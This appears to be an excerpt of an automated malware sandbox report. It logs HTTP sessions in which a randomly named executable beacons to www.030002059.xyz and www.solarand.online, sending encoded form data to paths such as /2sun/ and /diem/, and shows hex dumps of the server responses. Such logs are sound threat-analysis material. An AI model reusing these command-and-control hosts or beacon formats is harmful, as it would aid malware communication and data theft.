                                                                                                                                                                              Data Raw: 5a 54 3d 33 6d 34 49 52 6b 38 6f 54 33 58 4c 56 62 30 36 65 49 70 62 38 2b 70 7a 38 76 6e 44 68 51 79 78 68 62 38 52 54 34 57 51 74 37 31 68 33 53 46 54 2f 56 49 4a 52 67 78 6f 41 2b 53 51 4e 4f 6d 6a 69 6e 74 69 48 4d 71 4d 58 4a 71 7a 78 69 6c 68 39 33 75 67 53 79 44 6f 4b 77 53 6f 53 59 6d 47 41 76 32 57 49 71 4c 2b 72 57 73 51 39 30 53 32 64 56 6c 32 54 54 65 47 50 66 75 75 62 38 34 57 68 54 38 44 2b 6c 4e 50 6f 47 58 76 45 45 61 51 4a 59 61 57 50 79 42 76 48 6c 2b 2b 6b 50 51 6b 65 36 76 76 6e 74 68 57 4f 54 47 75 66 56 47 2f 73 44 68 4a 4e 51 47 70 31 65 2b 32 58 48 38 71 5a 4b 63 6d 4e 4b 74 55 37 6b 72 74 55 51 4f 5a 34 55 68 41 6b 63 62 47 63 50 55 6b 46 39 6e 4d 59 6c 69 73 4f 31 54 6b 33 46 58 56 67 4c 51 2f 4b 78 55 74 73 48 4f 4e 52 32 69 5a 6f 32 42 47 43 53 5a 7a 69 61 58 5a 54 71 6b 4a 31 4d 7a 6d 58 66 76 73 7a 6f 33 6c 59 6d 54 53 68 6a 4a 32 31 37 52 39 4c 4f 4e 54 36 67 78 53 66 75 57 61 76 62 65 42 6d 6e 77 75 44 65 31 35 4f 71 4a 56 52 30 50 54 6a 71 37 57 2b 44 6d 75 62 78 56 [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=3m4IRk8oT3XLVb06eIpb8+pz8vnDhQyxhb8RT4WQt71h3SFT/VIJRgxoA+SQNOmjintiHMqMXJqzxilh93ugSyDoKwSoSYmGAv2WIqL+rWsQ90S2dVl2TTeGPfuub84WhT8D+lNPoGXvEEaQJYaWPyBvHl++kPQke6vvnthWOTGufVG/sDhJNQGp1e+2XH8qZKcmNKtU7krtUQOZ4UhAkcbGcPUkF9nMYlisO1Tk3FXVgLQ/KxUtsHONR2iZo2BGCSZziaXZTqkJ1MzmXfvszo3lYmTShjJ217R9LONT6gxSfuWavbeBmnwuDe15OqJVR0PTjq7W+DmubxVpZlULsDwC82wmMV8ud4HRXIeRF0ASXuAfFcv3eIUztgqJsIFUJEOWt36s3CQYQ3Jx8f53sA3X6LbhPyojeYtHy701nsH5MuocqYR15ou3k7A2FZoAVlvRcKHQ+zjDmTnBCSW4PuHbbHtbi6Peasgqhx5M2Vj+bjdh16Al+9fbZdulV/KezxFHoYjoKBELmxdekcsaAn62N5ov7n39lmLbzRZQCDB9sPcTmmYwS2Tpd59dIYLWbNQjgQRyBW5gBHWM3zHHI9hucdTapNmmPTvCSTV3+zps3AoYKxxmxgBrf/CVedXHS372+OzVVi2t05aiQ3xJWJ1BFyk/s+G9gXzgxQLYI7yZe5gjZf9Oy0WyNSPt19ydTyOM9jqK9ORgEHzqgOuF6kexRyYfHR8Ig8Ylh67V+EJNAyfRIJLtRNhgz82RgsdIvLZY4QlNu5mc30gEstH7OoqFUmXBbJ0naGTzOz3+Rjhs+5CymZeqL80X+0xMgVB0+n0/5LyuLH9j12en7LFVdHzK0+RRb0v4IugRgb2xS6XPRvSmQdYec+Lj6Lq58EKMCL141cbBk+NuJ8wHX+JMBw1y70nKZQuq1c+pkSxsV+mGFeM3xB7oIgNauquX90jBOtBTvx+X+HSlo/shGQPXQTnuiyanEruiZncGWal5WD5tUzc9x [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:08.869854927 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:08 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:08.869898081 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                              Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.449918217.160.0.60803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:10.566611052 CET448OUTGET /diem/?mTkD=Gj2Ti2T0g4&ZT=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:11:11.413075924 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 4545
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:11 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:11.413149118 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                                                                                                              Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                                                                                                              Oct 30, 2024 08:11:11.413183928 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                                                                                                              Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                                                                                                              Oct 30, 2024 08:11:11.413218975 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                                                                                                                              Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.449954161.97.142.144803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:16.620498896 CET713OUTPOST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4b 48 48 5a 34 30 36 55 5a 35 76 74 46 75 43 50 49 4c 45 47 2b 39 65 6c 55 4b 53 41 67 78 56 4f 30 74 47 34 46 77 33 75 63 75 65 4e 50 47 73 53 50 43 78 65 38 46 75 5a 33 6b 68 79 6f 6f 6f 59 38 71 55 39 39 4b 44 4a 52 53 71 46 4e 6b 67 6d 7a 4c 69 7a 4c 6b 61 50 42 4f 46 39 69 33 34 78 7a 71 34 33 44 35 4b 58 34 6f 66 33 71 7a 4c 33 64 2b 55 45 30 68 52 6b 54 4b 4f 78 69 47 66 47 65 5a 47 6e 50 74 55 54 51 30 52 4a 73 79 64 4e 61 5a 75 38 6b 74 35 41 51 44 50 6d 55 4e 48 2b 71 6e 38 5a 56 68 70 51 48 65 4a 68 56 6e 4f 56 59 74 38 4a 41 55 4b 67 78 6c 57 38 64 46 49 51 44 51 3d 3d
                                                                                                                                                                              Data Ascii: ZT=KHHZ406UZ5vtFuCPILEG+9elUKSAgxVO0tG4Fw3ucueNPGsSPCxe8FuZ3khyoooY8qU99KDJRSqFNkgmzLizLkaPBOF9i34xzq43D5KX4of3qzL3d+UE0hRkTKOxiGfGeZGnPtUTQ0RJsydNaZu8kt5AQDPmUNH+qn8ZVhpQHeJhVnOVYt8JAUKgxlW8dFIQDQ==
                                                                                                                                                                              Oct 30, 2024 08:11:17.480217934 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:17 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                              Oct 30, 2024 08:11:17.480247021 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.449969161.97.142.144803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:19.179251909 CET733OUTPOST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4b 48 48 5a 34 30 36 55 5a 35 76 74 45 4d 57 50 4c 72 34 47 75 74 65 6d 59 71 53 41 79 78 56 43 30 74 4b 34 46 78 7a 45 63 38 36 4e 4d 6e 63 53 64 57 6c 65 73 56 75 5a 38 45 68 33 33 34 6f 70 38 71 52 41 39 49 58 4a 52 53 2b 46 4e 6d 6f 6d 7a 34 36 77 5a 45 61 52 55 65 46 2f 6f 58 34 78 7a 71 34 33 44 35 76 77 34 6f 58 33 71 69 37 33 50 4d 39 32 76 42 52 72 65 61 4f 78 6f 6d 66 4b 65 5a 47 56 50 6f 4d 70 51 32 35 4a 73 32 4e 4e 61 74 61 7a 74 74 35 43 65 6a 4f 4d 45 38 7a 77 6b 6b 42 68 61 67 4d 79 5a 36 4d 44 55 68 44 50 4a 63 64 65 53 55 75 54 73 69 66 49 51 47 31 5a 59 63 72 50 70 6c 30 58 71 77 59 55 69 43 45 42 78 6d 6e 7a 73 4e 51 3d
                                                                                                                                                                              Data Ascii: ZT=KHHZ406UZ5vtEMWPLr4GutemYqSAyxVC0tK4FxzEc86NMncSdWlesVuZ8Eh334op8qRA9IXJRS+FNmomz46wZEaRUeF/oX4xzq43D5vw4oX3qi73PM92vBRreaOxomfKeZGVPoMpQ25Js2NNataztt5CejOME8zwkkBhagMyZ6MDUhDPJcdeSUuTsifIQG1ZYcrPpl0XqwYUiCEBxmnzsNQ=
                                                                                                                                                                              Oct 30, 2024 08:11:20.001339912 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:19 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                              Oct 30, 2024 08:11:20.001355886 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.449985161.97.142.144803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:21.725886106 CET10815OUTPOST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4b 48 48 5a 34 30 36 55 5a 35 76 74 45 4d 57 50 4c 72 34 47 75 74 65 6d 59 71 53 41 79 78 56 43 30 74 4b 34 46 78 7a 45 63 38 79 4e 4d 52 67 53 50 68 5a 65 2b 46 75 5a 67 55 68 32 33 34 6f 77 38 75 30 48 39 49 62 7a 52 52 47 46 4d 44 38 6d 69 35 36 77 53 45 61 52 4c 75 46 2b 69 33 34 6b 7a 72 55 7a 44 35 2f 77 34 6f 58 33 71 68 6a 33 4e 65 56 32 6f 78 52 6b 54 4b 4f 39 69 47 66 75 65 5a 65 2f 50 6f 35 57 54 47 5a 4a 73 58 68 4e 4a 6f 75 7a 77 64 35 45 5a 6a 4f 55 45 38 75 79 6b 6b 4d 59 61 67 35 66 5a 39 45 44 56 77 79 56 5a 59 70 6b 49 55 72 42 38 77 4c 66 66 30 39 4b 58 4d 65 79 74 56 30 31 7a 54 64 33 69 54 6c 37 71 57 7a 5a 75 4b 63 31 71 47 70 57 42 64 59 37 4d 37 58 69 56 58 4b 79 52 6f 49 66 33 53 30 71 69 45 77 63 63 53 51 44 72 4a 43 42 54 6c 6c 7a 76 6a 31 45 54 4f 6f 2f 47 47 78 6d 70 36 70 43 44 6a 47 5a 73 38 6a 64 75 46 55 69 34 2b 4e 6f 52 34 4c 35 4e 6b 6c 4c 52 51 71 6c 67 65 67 30 43 54 6b 45 51 4c 36 44 73 4b 5a 36 6a 49 43 77 36 41 64 5a 36 77 31 62 50 37 36 59 69 46 5a [TRUNCATED]
